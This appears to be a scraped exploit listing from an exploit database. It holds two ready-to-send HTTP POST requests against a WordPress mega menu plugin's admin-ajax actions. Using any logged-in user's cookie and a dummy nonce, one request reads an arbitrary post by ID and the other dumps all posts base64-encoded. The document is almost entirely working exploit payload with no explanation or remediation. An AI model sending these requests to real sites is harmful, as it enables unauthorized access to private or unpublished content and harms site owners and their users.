Share
## https://sploitus.com/exploit?id=WPEX-ID:11E56EEF-77CD-41D7-B6B8-F75472CC0D1D
Access an Arbitrary Post (post ID is via the theme_id):

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Cookie: [any authenticated user]
Connection: close

action=export_wpmm_theme&theme_id=1055&wpmmm_save_new_theme_nonce_field=dummy


Access All posts at once (result is base64 encoded)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Cookie: [any authenticated user]
Connection: close

action=export_wp_megamenu_nav_menu&menu=1&wpmmm_nav_export_nonce_field=dummy